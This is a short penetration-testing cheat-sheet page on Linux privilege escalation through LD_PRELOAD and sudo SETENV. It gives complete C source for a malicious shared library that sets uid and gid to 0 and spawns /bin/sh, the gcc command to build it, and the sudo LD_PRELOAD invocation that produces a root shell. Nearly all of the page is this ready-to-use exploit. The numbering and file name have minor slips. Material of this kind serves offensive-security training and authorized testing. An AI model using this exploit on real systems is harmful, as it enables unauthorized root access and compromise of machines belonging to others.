LD_Preload / SETENV

There are a couple of different ways I have found this to work:

1. In the below image, if you see the marked area when running sudo -l then you should be good to go.

2. If you run sudo -l and see SETENV under sudo permissions then I would also try this. Note: I had a file path after SETENV when this worked. I have not tried it with a bin, so I can't verify if it works the same.

On attacker machine create a file called shell.c with the following code.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

2. Build the shell.c code into shell.co

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

3. Transfer the shell.so file to the target machine.

4. Run the code below to get a root shell. Replace the /usr/bin/ping with the path specified in the output from sudo -l.

sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping

PreviousPriv Esc NextWeb Apps

Last updated 3 years ago